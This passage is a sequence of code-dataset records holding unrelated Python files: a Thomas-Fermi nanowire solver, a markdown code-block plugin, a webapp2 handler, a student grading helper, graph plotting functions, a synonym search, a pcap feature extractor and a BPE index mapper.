mu_d[dot_index] = mu_vec[dot_center_index] \n return root.x,mu_d\n\n # Iterative fixed mu solver is not very useful since if the mu is fixed, the turning points do not change. Hence there is nothing to iterate over.\n # Even if the potential were replaced by the effective potential V_eff = V + Kn in each iteration, the solver enforces V + Kn = mu, so there are no changes in the mask.\n def tf_iterative_solver_fixed_mu(self,mu_d,N_lim = 10):\n '''\n Solve the TF problem iteratively until the mask converges.\n\n In each iteration, the potential is updated to the effective potential \n V_eff = V + K.n\n\n The iteration ends when the mask converges to a fixed value or N_lim iterations are reached.\n '''\n old_mask = self.mask.mask\n i = 0\n while(i < N_lim):\n n,N_d = self.tf_solver_fixed_mu(mu_d) \n \n self.mask.calculate_new_mask_turning_points(self.V,self.mu_l,mu_d)\n self.mask.calculate_mask_info_from_mask()\n \n if(old_mask == self.mask.mask):\n break \n old_mask = self.mask.mask\n i += 1\n if(i == N_lim):\n raise Exception("Mask failed to converge in Thomas Fermi iterative fixed mu solver.") \n return n,N_d\n\n def tf_iterative_solver_fixed_N(self,N_d,N_lim = 10,strategy='opt_iter'):\n '''\n Solve the TF problem iteratively until the mask converges.\n\n In each iteration, the potential is updated to the effective potential \n V_eff = V + K.n\n\n The iteration ends when the mask converges to a fixed value or N_lim iterations are reached.\n '''\n # simple strategy uses the fixed N solver only once\n # does not iterate to find a mask beyond the prelim_mask\n if strategy == 'simple':\n n,mu_d = self.tf_solver_fixed_N(N_d) \n return n,mu_d\n\n # simple_iter strategy uses the fixed N solver iteratively\n # in each iteration, depending on the new chemical potential(s) found, the turning points\n # and the mask are updated until the mask converges to a fixed value\n # N_d is recalculated from the new mask to handle cases where new smaller dots are formed\n elif strategy == 'simple_iter':\n old_mask = self.mask.mask\n i = 0\n while(i < N_lim):\n n,mu_d = self.tf_solver_fixed_N(N_d) \n \n self.mask.calculate_new_mask_turning_points(self.V,self.mu_l,mu_d)\n self.mask.calculate_mask_info_from_mask()\n \n if(old_mask == self.mask.mask):\n break \n old_mask = self.mask.mask\n N_d = self.calculate_N_d_from_n(n)\n 
i += 1\n if(i == N_lim):\n raise Exception("Mask failed to converge in Thomas Fermi simple iterative fixed N solver.") \n return n,mu_d\n \n elif strategy == 'opt': \n n,mu_d = self.tf_solver_fixed_N_opt(N_d)\n return n,mu_d\n\n elif strategy == 'opt_iter': \n old_mask = self.mask.mask\n i = 0\n while(i < N_lim):\n n,mu_d = self.tf_solver_fixed_N_opt(N_d) \n \n self.mask.calculate_new_mask_turning_points(self.V,self.mu_l,mu_d)\n self.mask.calculate_mask_info_from_mask()\n \n if(old_mask == self.mask.mask):\n break \n old_mask = self.mask.mask\n N_d = self.calculate_N_d_from_n(n)\n i += 1\n if(i == N_lim):\n raise Exception("Mask failed to converge in Thomas Fermi iterative fixed N solver.") \n return n,mu_d\n\n else:\n raise Exception("Unknown strategy in iterative fixed N solver.")\n\n def calculate_thomas_fermi_energy(self,n,mu_d):\n '''\n Input: \n n : electron density\n mu_d : dot potentials\n Output:\n E : Thomas-Fermi energy\n\n E = V n + 1/2 n K n\n '''\n #n_without_leads = np.zeros(len(n))\n #for i in range(len(n)):\n # if(self.mask.mask[i] != 'l'):\n # n_without_leads[i] = n[i]\n n_without_leads = n\n E = np.sum(self.V*n_without_leads) + 0.5 * np.sum(n_without_leads*np.dot(self.K,n_without_leads.T)) \n return E\n\n def calculate_N_d_from_n(self,n):\n '''\n Input:\n n : electron density\n Output:\n N_d : vector of size mask.mask_info['num_dot'] with number of electrons on each dot according to self.mask and n\n '''\n N_d = np.zeros(self.mask.mask_info['num_dot'])\n for key,val in self.mask.mask_info.items():\n if key[0] == 'd':\n dot_index = int(key[1:])\n N_d[dot_index] = np.sum(n[val[0]:(val[1] + 1)])\n return N_d\n","sub_path":"nanowire_model/thomas_fermi.py","file_name":"thomas_fermi.py","file_ext":"py","file_size_in_byte":15873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
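A minimal standalone sketch of the block-matrix (KKT) pattern that create_fixed_mu_A/create_fixed_mu_b assemble above, on a hypothetical 4-point grid with one barrier site; the kernel K, potential V, and mu values here are made up for illustration.

import numpy as np

# hypothetical 4-point grid: sites 0-2 are free, site 3 is a barrier (n = 0)
K = np.identity(4) + 0.1                # stand-in interaction kernel (assumption)
V = np.array([0.2, 0.1, 0.3, 0.5])      # stand-in external potential (assumption)
mu = np.array([1.0, 1.0, 1.0, 0.0])     # chemical potential; 0 over the barrier

# KKT system for: minimize 1/2 n.K.n + (V - mu).n  subject to  n[3] = 0
A = np.zeros((5, 5))
A[:4, :4] = K
A[3, 4] = -1.0     # -mu_bar enters the barrier row, as in create_fixed_mu_A
A[4, 3] = 1.0      # constraint row enforcing n[3] = 0
b = np.zeros(5)
b[:4] = mu - V     # the (mu_x - V) block from create_fixed_mu_b

z = np.linalg.solve(A, b)
n, mu_bar = z[:4], z[4]
print(n)           # n[3] comes out 0 up to floating-point error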
+{"seq_id":"131867339","text":"# -*- coding: utf-8 -*-\n\nimport re\nfrom pygments import highlight\nfrom pygments import lexers\nfrom pygments import formatters\n\n###### def\ndef pygmentize(code_raw, language):\n lexer = lexers.get_lexer_by_name(language, encoding='utf-8', startinline=True)\n return highlight(code_raw, lexer, formatters.HtmlFormatter(encoding="utf-8",startinline=True))\n\ndef tableize_code (text, lang = ""):\n string = text.strip()\n table = ['<div class="highlight"><table><tr><td class="gutter"><pre class="line-numbers">']\n    code = []\n    index = 0\n    for line in string.split("\n"):\n        table.append("%d\n" % (index+1))\n        code.append("%s" % line)\n        index += 1\n    table.append("
</pre></td><td class='code'><pre><code class='%s'>%s</code></pre></td></tr></table></div>
    \" % (lang, \"\\n\".join(code)))\n return \"\".join(table)\n\ndef strip_hl_div(text):\n __HL_RE = re.compile('
<div class="highlight"><pre>(.+?)</pre></div>
    ', re.UNICODE|re.I|re.M|re.S)\n m = __HL_RE.match(text)\n if m:\n return text.replace(m.group(0), m.group(1))\n return text\n\n\n####### code block #####\ndef code_block(text):\n \"\"\"\n Syntax\n {% codeblock [title] [lang:language] [url] [link text] %}\n code snippet\n {% endcodeblock %}\n \"\"\"\n __CODE_BLOCK_RE = re.compile(r\"\"\"\\s({% codeblock ([^%\\[\\]]*)%}(.+?){% endcodeblock %})\"\"\",re.I|re.M|re.S)\n __CaptionUrlTitle = re.compile('(\\S[\\S\\s]*)\\s+(https?:\\/\\/\\S+|\\/\\S+)\\s*(.+)?', re.UNICODE|re.I|re.M|re.S)\n __Caption = re.compile('(\\S[\\S\\s]*)', re.UNICODE|re.I|re.M|re.S)\n __Lang = re.compile('\\s*lang:(\\S+)', re.UNICODE|re.I|re.M|re.S)\n\n codes = __CODE_BLOCK_RE.findall(text)\n for code in codes:\n caption = \"\"\n filetype = \"\"\n fileurl = \"\"\n code_block_str = code[0]\n code_info = code[1]\n code_raw = code[2]\n if code_info:\n m = __Lang.search(code_info)\n if m:\n filetype = m.group(1)\n code_info = __Lang.sub(\"\", code_info)\n m = __CaptionUrlTitle.match(code_info)\n if m:\n filename = m.group(1)\n caption = \"
<figcaption><span>%s</span><a href='%s'>%s</a></figcaption>
    \\n\" % (m.group(1), m.group(2), m.group(3))\n else:\n m2 = __Caption.match(code_info)\n if m2:\n filename = m2.group(1)\n caption = \"
<figcaption><span>%s</span></figcaption>
    \\n\" % m2.group(1)\n else:\n filename = \"\"\n caption = \"\"\n if not filetype and filename:\n m = re.search(r\"\\S[\\S\\s]*\\w+\\.(\\w+)\", filename)\n if m:\n filetype = m.group(1)\n\n #\n source = [\"
    \"]\n if caption:\n source.append(caption)\n if filetype:\n try:\n hltext = pygmentize(code_raw, filetype)\n tmp_text = tableize_code (strip_hl_div(hltext), filetype)\n except:\n tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))\n else:\n tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))\n source.append(tmp_text)\n source.append(\"
    \")\n #print \"\\n\".join(source)\n text = text.replace(code_block_str, \"\\n\".join(source))\n\n return text\n\n### Backtick Code Blocks ###\ndef backtick_code_block(text):\n \"\"\"\n Syntax\n ``` [language] [title] [url] [link text]\n code snippet\n ```\n \"\"\"\n __CODE_BLOCK_RE = re.compile(r\"\"\"\\s(^`{3} *([^\\n]+)?\\n(.+?)\\n`{3})\"\"\",re.I|re.M|re.S)\n __AllOptions = re.compile('([^\\s]+)\\s+(.+?)\\s+(https?:\\/\\/\\S+|\\/\\S+)\\s*(.+)?', re.UNICODE|re.I|re.M|re.S)\n __LangCaption = re.compile('([^\\s]+)\\s*(.+)?', re.UNICODE|re.I|re.M|re.S)\n codes = __CODE_BLOCK_RE.findall(text)\n for code in codes:\n options = \"\"\n caption = \"\"\n lang = \"\"\n fileurl = \"\"\n code_block_str = code[0]\n code_info = code[1]\n code_raw = code[2]\n if code_info:\n m = __AllOptions.match(code_info)\n if m:\n lang = m.group(1)\n caption = \"
<figcaption><span>%s</span><a href='%s'>%s</a></figcaption>
    \" % (m.group(2), m.group(3), m.group(4))\n else:\n m2 = __LangCaption.match(code_info)\n if m2:\n lang = m2.group(1)\n caption = \"
<figcaption><span>%s</span></figcaption>
    \" % m2.group(2)\n if re.match('\\A( {4}|\\t)', code_raw):\n code_raw = re.sub('^( {4}|\\t)', '', code_raw)\n\n #\n source = [\"
    \"]\n if caption:\n source.append(caption)\n\n if not lang or lang == 'plain':\n tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))\n else:\n try:\n hltext = pygmentize(code_raw, lang)\n tmp_text = tableize_code (strip_hl_div(hltext), lang)\n except:\n tmp_text = tableize_code (code_raw.replace('<','<').replace('>','>'))\n\n source.append(tmp_text)\n source.append(\"
    \")\n text = text.replace(code_block_str, \"\\n\".join(source))\n return text\n\n### VideoTag ###\ndef videotag(text):\n \"\"\"\n Syntax\n {% video url/to/video [width height] [url/to/poster] %}\n \"\"\"\n __VIDEOTAG_RE = re.compile(r\"\"\"\\s({% video (https?:\\S+)(\\s+(https?:\\S+))?(\\s+(https?:\\S+))?(\\s+(\\d+)\\s(\\d+))?(\\s+(https?:\\S+))? %})\"\"\",re.I|re.M|re.S)\n codes = __VIDEOTAG_RE.findall(text)\n vtype = {\n 'mp4': \"type='video/mp4; codecs=\\\"avc1.42E01E, mp4a.40.2\\\"'\",\n 'ogv': \"type='video/ogg; codecs=theora, vorbis'\",\n 'webm': \"type='video/webm; codecs=vp8, vorbis'\"\n }\n\n for code in codes:\n video = code[1]\n width = int(code[7])\n height = int(code[8])\n poster = code[10]\n\n if video and width > 0 and height > 0:\n video_code = []\n video_code.append(\"\")\n text = text.replace(code[0], \"\".join(video_code))\n\n return text\n\n###########\ndef parse_text(text):\n #text = code_block(text)\n text = videotag(text)\n text = backtick_code_block(text)\n return text\n","sub_path":"plugins.py","file_name":"plugins.py","file_ext":"py","file_size_in_byte":6619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"281738474","text":"import os\nimport webapp2\n\nclass MainPage(webapp2.RequestHandler):\n def get(self):\n path = os.path.join(os.path.dirname (__file__), 'index.min.html')\n f = open(\"index.min.html\", \"r\")\n self.response.headers ['Content-Type'] = 'text/html'\n self.response.write(f.read())\n\napplication = webapp2.WSGIApplication([\n ('/', MainPage),\n], debug=True)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"77425489","text":"import json\nfrom lib.file_management.file_management_lib import FileEditor, DirManagement, WorkEditor\nimport os\nimport sys\nimport inspect\nimport time\ncurrentdir = os.path.dirname(os.path.abspath(\n inspect.getfile(inspect.currentframe())))\nsys.path.insert(0, currentdir)\n\n\ndef inask(question: str) -> str:\n \"\"\"\n this fnc made for test because we need user input but intest it cant typing itself os it need to call patch module\n but it need to create a sperate function and call it in function that we want to use\n Args:\n question (str): any string\n Returns:\n str: user input\n \"\"\"\n answer = input(question)\n return answer\n\n\nclass StudentData:\n def __init__(self, path: str, filename: str, draft: dict) -> None:\n \"\"\"\n init draft \n draft_file (str) \n draft_work (list)\n if user did not have draft.json it will return None\n Args:\n path (str): path of work directory\n filename (str): name of student's directory of file\n \"\"\"\n self.draft_file = draft[\"fileDraft\"]\n self.draft_out = draft[\"outputDraft\"]\n self.pre_data = None\n self.filename = filename\n\n def _filename_pre_data(self) -> dict:\n \"\"\"prepare filename to dict\n pseudo code:\n -get key word form file draft and store it in key\n -split filename with \"_\" so we will got list of student name, id, ex, etc.\n -we will zip it together and store into prework(dict) that keep student data and key word \n example: {\"student_id\": \"1234567890\", \"name\": \"Alex\", \"ex\": \"ex1}\n Returns:\n dict: student data form file name\n \"\"\"\n key = []\n remainder = \"\"\n prework = {}\n for i in self.draft_file:\n if i == \"{\":\n remainder = \"\"\n elif i == \"}\":\n key.append(remainder)\n else:\n remainder += i\n list_filename = 
self.filename.split(\"_\")\n for key, value in zip(key, list_filename):\n prework[key] = value\n self.pre_data = prework\n\n def check_work_score(self,work_score):\n for i in work_score:\n if i[\"studentId\"] == self.pre_data[\"studentId\"]:\n return False\n return True \n \n def prepare_student_data(self) -> dict:\n \"\"\"make that studect_data(dict) ready for the next step by get the output draft \n and set it into student_data and have its value is \"N/\"A\n Returns:\n dict: empty student data that have only data from file name but another is \"N/A\"\n \"\"\"\n self._filename_pre_data()\n empty_student = {}\n empty_student[\"scoreTimestamp\"] = \"N/A\"\n for i in self.draft_out:\n empty_student[i] = \"N/A\"\n for i in self.pre_data:\n empty_student[i] = self.pre_data[i]\n self.pre_data = empty_student\n\n def data_input(self, post_student_data: dict) -> dict:\n \"\"\"get data form user and set into student data(dict)\n pseudo code:\n for loop post_student_data and if its \"N/A\" ask user for information\n and store it. But if the input was -99 it will skip that question to next one\n and when its finish it will return post_student_data\n example:\n {'student_id': '6310546066', 'name': 'vitvara', 'ex': 'ex1', 'score1': '10', 'score2': '20', 'comment': 'nice work'}\n Args:\n post_student_data (dict): empty_student_data\n Returns:\n dict: student data that ready to write\n \"\"\"\n for i in post_student_data: \n if post_student_data[i] == \"N/A\":\n while True:\n if i == \"scoreTimestamp\":\n post_student_data[i] = int(round(time.time() * 1000))\n break\n data_input = input(f\"Enter {i}: \")\n if data_input == \"-99\":\n break\n if i == \"score\":\n try:\n data_input = float(data_input)\n except ValueError:\n print(\"Value Error: please enter a numeric score.\")\n continue\n post_student_data[i] = data_input\n break\n \n return post_student_data\n\n def ask(self) -> data_input:\n \"\"\"ask user for student data\n pseudo code:\n loop empty_student_data if its not \"N/A\" it will print out its key and value\n then it will call data_input\n Returns:\n data_input: return student data that ready to write\n \"\"\"\n print(\"===========================\")\n post_student_data = self.pre_data\n for i in post_student_data:\n if post_student_data[i] != \"N/A\":\n print(f\"{i}: {post_student_data[i]}\")\n print(\"===========================\")\n post_data = self.data_input(post_student_data)\n return post_data\n","sub_path":"src/main/student_data.py","file_name":"student_data.py","file_ext":"py","file_size_in_byte":5048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"316577981","text":"# plot.py\n# Created by Jaewon Chung on 2018-10-19.\n# Email: j1c@jhu.edu\n# Copyright (c) 2018. 
+{"seq_id":"316577981","text":"# plot.py\n# Created by Jaewon Chung on 2018-10-19.\n# Email: j1c@jhu.edu\n# Copyright (c) 2018. All rights reserved.\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\n\nfrom ..utils import import_graph, pass_to_ranks\n\n\ndef _check_common_inputs(figsize=None,\n height=None,\n title=None,\n context=None,\n font_scale=None,\n legend_name=None):\n # Handle figsize\n if figsize is not None:\n if not isinstance(figsize, tuple):\n msg = 'figsize must be a tuple, not {}.'.format(type(figsize))\n raise TypeError(msg)\n\n # Handle heights\n if height is not None:\n if not isinstance(height, (int, float)):\n msg = 'height must be an integer or float, not {}.'.format(\n type(height))\n raise TypeError(msg)\n\n # Handle title\n if title is not None:\n if not isinstance(title, str):\n msg = 'title must be a string, not {}.'.format(type(title))\n raise TypeError(msg)\n\n # Handle context\n if context is not None:\n if not isinstance(context, str):\n msg = 'context must be a string, not {}.'.format(type(context))\n raise TypeError(msg)\n elif not context in ['paper', 'notebook', 'talk', 'poster']:\n msg = 'context must be one of (paper, notebook, talk, poster), \\\n not {}.'.format(context)\n raise ValueError(msg)\n\n # Handle font_scale\n if font_scale is not None:\n if not isinstance(font_scale, (int, float)):\n msg = 'font_scale must be an integer or float, not {}.'.format(\n type(font_scale))\n raise TypeError(msg)\n\n # Handle legend name\n if legend_name is not None:\n if not isinstance(legend_name, str):\n msg = 'legend_name must be a string, not {}.'.format(\n type(legend_name))\n raise TypeError(msg)\n\n\ndef _transform(arr, method):\n if method is not None:\n if method == 'log':\n #arr = np.log(arr, where=(arr > 0))\n #hacky, but np.log(arr, where=arr>0) is really buggy\n arr = arr.copy()\n arr[arr > 0] = np.log(arr[arr > 0])\n elif method in ['zero-boost', 'simple-all', 'simple-nonzero']:\n arr = pass_to_ranks(arr, method=method)\n else:\n msg = 'Transform must be one of: log, zero-boost, simple-all, \\\n simple-nonzero, not {}.'.format(method)\n raise ValueError(msg)\n\n return arr\n\n\ndef heatmap(X,\n transform=None,\n figsize=(10, 10),\n title=None,\n context='talk',\n font_scale=1,\n xticklabels=False,\n yticklabels=False,\n cmap='RdBu_r',\n center=0,\n cbar=True):\n r"""\n Plots a graph as a heatmap.\n\n Parameters\n ----------\n X : nx.Graph or np.ndarray object\n Graph or numpy matrix to plot\n transform : None, or string {'log', 'zero-boost', 'simple-all', 'simple-nonzero'}\n\n - 'log' :\n Plots the log of all nonzero numbers\n - 'zero-boost' :\n Pass to ranks method. Preserves the edge weight for all 0s, but ranks \n the other edges as if the ranks of all 0 edges had been assigned. \n - 'simple-all': \n Pass to ranks method. Assigns ranks to all non-zero edges, settling \n ties using the average. Ranks are then scaled by \n :math:`\frac{2 rank(\text{non-zero edges})}{n^2 + 1}` \n where n is the number of nodes\n - 'simple-nonzero':\n Pass to ranks method. 
Same as simple-all, but ranks are scaled by\n :math:`\frac{2 rank(\text{non-zero edges})}{\text{total non-zero edges} + 1}`\n figsize : tuple of integers, optional, default: (10, 10)\n Width, height in inches.\n title : str, optional, default: None\n Title of plot.\n context : None, or one of {paper, notebook, talk (default), poster}\n The name of a preconfigured set.\n font_scale : float, optional, default: 1\n Separate scaling factor to independently scale the size of the font\n elements.\n xticklabels, yticklabels : bool or list, optional\n If list-like, plot these alternate labels as the ticklabels.\n cmap : str, default: 'RdBu_r'\n Valid matplotlib color map.\n center : float, default: 0\n The value at which to center the colormap\n cbar : bool, default: True\n Whether to draw a colorbar.\n """\n _check_common_inputs(\n figsize=figsize, title=title, context=context, font_scale=font_scale)\n\n # Handle ticklabels\n if isinstance(xticklabels, list):\n if len(xticklabels) != X.shape[1]:\n msg = 'xticklabels must have same length {}.'.format(X.shape[1])\n raise ValueError(msg)\n elif not isinstance(xticklabels, bool):\n msg = 'xticklabels must be a bool or a list, not {}'.format(\n type(xticklabels))\n raise TypeError(msg)\n\n if isinstance(yticklabels, list):\n if len(yticklabels) != X.shape[0]:\n msg = 'yticklabels must have same length {}.'.format(X.shape[0])\n raise ValueError(msg)\n elif not isinstance(yticklabels, bool):\n msg = 'yticklabels must be a bool or a list, not {}'.format(\n type(yticklabels))\n raise TypeError(msg)\n\n # Handle cmap\n if not isinstance(cmap, str):\n msg = 'cmap must be a string, not {}.'.format(type(cmap))\n raise TypeError(msg)\n\n # Handle center\n if center is not None:\n if not isinstance(center, (int, float)):\n msg = 'center must be an integer or float, not {}.'.format(\n type(center))\n raise TypeError(msg)\n\n # Handle cbar\n if not isinstance(cbar, bool):\n msg = 'cbar must be a bool, not {}.'.format(type(cbar))\n raise TypeError(msg)\n\n arr = import_graph(X)\n arr = _transform(arr, transform)\n #arr = _transform(X, transform)\n\n # Global plotting settings\n CBAR_KWS = dict(shrink=0.7)\n\n with sns.plotting_context(context, font_scale=font_scale):\n fig, ax = plt.subplots(figsize=figsize)\n plot = sns.heatmap(\n arr,\n cmap=cmap,\n square=True,\n xticklabels=xticklabels,\n yticklabels=yticklabels,\n cbar_kws=CBAR_KWS,\n center=center,\n cbar=cbar,\n ax=ax)\n if title is not None:\n plot.set_title(title)\n\n return plot\n\n\ndef gridplot(X,\n labels,\n transform=None,\n height=10,\n title=None,\n context='talk',\n font_scale=1,\n alpha=0.7,\n sizes=(10, 200)):\n r"""\n Plots multiple graphs as a grid, with intensity denoted by the size \n of dots on the grid.\n\n Parameters\n ----------\n X : list of nx.Graph or np.ndarray object\n List of nx.Graph or numpy arrays to plot\n labels : list of str\n List of strings, which are labels for each element in X. \n `len(X) == len(labels)`.\n transform : None, or string {'log', 'zero-boost', 'simple-all', 'simple-nonzero'}\n\n - 'log' :\n Plots the log of all nonzero numbers\n - 'zero-boost' :\n Pass to ranks method. Preserves the edge weight for all 0s, but ranks \n the other edges as if the ranks of all 0 edges had been assigned. \n - 'simple-all': \n Pass to ranks method. Assigns ranks to all non-zero edges, settling \n ties using the average. 
Ranks are then scaled by \n :math:`\frac{2 rank(\text{non-zero edges})}{n^2 + 1}` \n where n is the number of nodes\n - 'simple-nonzero':\n Pass to ranks method. Same as simple-all, but ranks are scaled by\n :math:`\frac{2 rank(\text{non-zero edges})}{\text{total non-zero edges} + 1}`\n height : int, optional, default: 10\n Height of figure in inches.\n title : str, optional, default: None\n Title of plot.\n context : None, or one of {paper, notebook, talk (default), poster}\n The name of a preconfigured set.\n font_scale : float, optional, default: 1\n Separate scaling factor to independently scale the size of the font\n elements.\n """\n _check_common_inputs(\n height=height, title=title, context=context, font_scale=font_scale)\n\n if isinstance(X, list):\n graphs = [import_graph(x) for x in X]\n else:\n msg = 'X must be a list, not {}.'.format(type(X))\n raise TypeError(msg)\n\n # Handle labels\n if not isinstance(labels, list):\n msg = 'labels must be a list, not {}.'.format(type(labels))\n raise TypeError(msg)\n elif len(labels) != len(graphs):\n msg = 'Expected {} elements in labels, but got {} instead.'.format(\n len(graphs), len(labels))\n raise ValueError(msg)\n\n graphs = [_transform(arr, transform) for arr in graphs]\n\n palette = sns.color_palette('Set1', desat=0.75, n_colors=len(labels))\n\n dfs = []\n for idx, graph in enumerate(graphs):\n rdx, cdx = np.where(graph > 0)\n weights = graph[(rdx, cdx)]\n df = pd.DataFrame(\n np.vstack([rdx, cdx, weights]).T,\n columns=['rdx', 'cdx','Weights'])\n df['Type'] = [labels[idx]] * len(cdx)\n dfs.append(df)\n\n df = pd.concat(dfs, axis=0)\n\n with sns.plotting_context(context, font_scale=font_scale):\n sns.set_style('white')\n plot = sns.relplot(\n data=df,\n x='cdx',\n y='rdx',\n hue='Type',\n size='Weights',\n sizes=sizes,\n alpha=alpha,\n palette=palette,\n height=height,\n facet_kws={'sharex':True,\n 'sharey':True,\n 'xlim':(0,graph.shape[0]),\n 'ylim':(0,graph.shape[0]),})\n plot.ax.axis('off')\n plot.ax.invert_yaxis()\n if title is not None:\n plot.set(title=title)\n\n return plot\n\n\n\ndef pairplot(X,\n Y=None,\n col_names=None,\n title=None,\n legend_name=None,\n variables=None,\n height=2.5,\n context='talk',\n font_scale=1,\n palette='Set1',\n alpha=0.7):\n r"""\n Plot pairwise relationships in a dataset.\n\n Parameters\n ----------\n X : array-like, shape (n_samples, n_features)\n Input data.\n Y : array-like or list, shape (n_samples), optional\n Labels that correspond to each sample in X.\n col_names : array-like or list, shape (n_features), optional\n Names or labels for each feature in X. If not provided, the default \n will be `Dimension 1, Dimension 2, etc`.\n title : str, optional, default: None\n Title of plot.\n legend_name : str, optional, default: None\n Title of the legend.\n variables : list of variable names, optional\n Variables to plot based on col_names, otherwise use every column with\n a numeric datatype.\n height : int, optional, default: 10\n Height of figure in inches.\n context : None, or one of {paper, notebook, talk (default), poster}\n The name of a preconfigured set.\n font_scale : float, optional, default: 1\n Separate scaling factor to independently scale the size of the font \n elements.\n palette : str, dict, optional, default: 'Set1'\n Set of colors for mapping the `hue` variable. 
If a dict, keys should\n be values in the hue variable.\n """\n _check_common_inputs(\n height=height,\n title=title,\n context=context,\n font_scale=font_scale,\n legend_name=legend_name)\n\n # Handle X\n if not isinstance(X, (list, np.ndarray)):\n msg = 'X must be array-like, not {}.'.format(type(X))\n raise TypeError(msg)\n\n # Handle Y\n if Y is not None:\n if not isinstance(Y, (list, np.ndarray)):\n msg = 'Y must be array-like or list, not {}.'.format(type(Y))\n raise TypeError(msg)\n elif X.shape[0] != len(Y):\n msg = 'Expected length {}, but got length {} instead for Y.'.format(\n X.shape[0], len(Y))\n raise ValueError(msg)\n\n # Handle col_names\n if col_names is None:\n col_names = [\n 'Dimension {}'.format(i) for i in range(1, X.shape[1] + 1)\n ]\n elif not isinstance(col_names, list):\n msg = 'col_names must be a list, not {}.'.format(type(col_names))\n raise TypeError(msg)\n elif X.shape[1] != len(col_names):\n msg = 'Expected length {}, but got length {} instead for col_names.'.format(\n X.shape[1], len(col_names))\n raise ValueError(msg)\n\n # Handle variables\n if variables is not None:\n if len(variables) > len(col_names):\n msg = 'variables cannot contain more elements than col_names.'\n raise ValueError(msg)\n else:\n for v in variables:\n if v not in col_names:\n msg = '{} is not a valid key.'.format(v)\n raise KeyError(msg)\n else:\n variables = col_names\n\n df = pd.DataFrame(X, columns=col_names)\n if Y is not None:\n if legend_name is None:\n legend_name = 'Type'\n df_labels = pd.DataFrame(Y, columns=[legend_name])\n df = pd.concat([df_labels, df], axis=1)\n\n with sns.plotting_context(context=context, font_scale=font_scale):\n if Y is not None:\n pairs = sns.pairplot(\n df,\n hue=legend_name,\n vars=variables,\n height=height,\n palette=palette,\n plot_kws=dict(alpha=alpha))\n else:\n pairs = sns.pairplot(\n df,\n vars=variables,\n height=height,\n palette=palette,\n plot_kws=dict(alpha=alpha))\n pairs.set(xticks=[], yticks=[])\n pairs.fig.subplots_adjust(top=0.945)\n pairs.fig.suptitle(title)\n\n return pairs","sub_path":"graspy/plot/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":14276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
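A hedged sketch of the 'simple-all' scaling described in the transform docstrings above, using scipy's rankdata; graspy's pass_to_ranks internals may differ in detail.

import numpy as np
from scipy.stats import rankdata

A = np.array([[0., 3., 1.],
              [3., 0., 2.],
              [1., 2., 0.]])

n = A.shape[0]
nz = A != 0
ranks = rankdata(A[nz])             # ranks of the non-zero edges, ties averaged
out = np.zeros_like(A)
out[nz] = 2 * ranks / (n ** 2 + 1)  # the 2*rank/(n^2 + 1) scaling from the docstring
print(out)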
+{"seq_id":"544447144","text":"import th_en\n\ndef synonym_index(w1, w2):\n """\n Tries to find degrees of synonymity between two words\n \n w1: a word (str)\n w2: another word (str)\n """\n if w1 not in th_en.thesaurus:\n return 666\n tried = {}\n def find_syn(word, target, depth, max_depth = 4):\n print(" "*depth+"Word:", word, "Depth:", depth)\n if depth >= max_depth:\n return 666\n syns = th_en.thesaurus[word]\n if target in syns:\n return depth\n else:\n returns = []\n # print(" "*depth+str(syns))\n for w in syns:\n if w in th_en.thesaurus:\n # if w not in tried:\n # print("Trying:",w," at depth", depth )\n tried[w] = "1"\n returns.append(find_syn(w, target, depth + 1))\n return min(returns+[666])\n \n return find_syn(w1, w2, 1)\n \nprint(synonym_index("turtle", "water"))","sub_path":"synonyms.py","file_name":"synonyms.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"132331054","text":"# -*- coding: utf-8 -*-\n# extra\n# Extract features from the test set\nfrom scapy.all import *\nimport shelve\n\npcap = raw_input("Enter pcap file path and name: ")\n#pcap = 'http.pcap'\nfile = rdpcap(pcap)\nlines = len(file)\n#print file\n\nraw_pkt = {}\nfor i in range(lines):\n raw_pkt[i] = file[i]\n\npropertys = {}\nfor i in range(lines):\n try:\n if(raw_pkt[i].proto == 6 or raw_pkt[i].proto == 17):\n if ((raw_pkt[i]['IP'].src =='192.168.64.128') and 'Raw' in raw_pkt[i]):\n #print 'yes'\n propertys[i + 1] = []\n propertys[i + 1].append(str(raw_pkt[i].proto))\n propertys[i + 1].append(str(raw_pkt[i].dport))\n propertys[i + 1].append(raw_pkt[i]['IP'].src)\n except AttributeError:\n continue\n\nprint('Extraction has finished')\nname = raw_input("Please use a new file to save it: ")\nsave = shelve.open(name)\nsave['res'] = propertys\nsave.close()","sub_path":"extra.py","file_name":"extra.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650748569","text":"with open('../iwslt/train.tok.bpe.32000.de', 'rt') as input_file:\n with open('../iwslt/train.bpe.idx.mapping.de', 'wt') as output_file:\n for line in input_file.readlines():\n line_list = line.split()\n mapping = []\n new_subwords = []\n for i, w in enumerate(line_list):\n new_subwords.append(i)\n if w[-2:] != '@@':\n mapping.append(new_subwords)\n new_subwords = []\n s = ' '.join([str(i)+':'+','.join([str(n) for n in subwords]) for i, subwords in enumerate(mapping)])\n output_file.write(s + '\\n')","sub_path":"process_files/split_by_subword.py","file_name":"split_by_subword.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"156794419","text":"##############################################################################\n#\n# Copyright (c) 2002 Zope Foundation and Contributors.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, 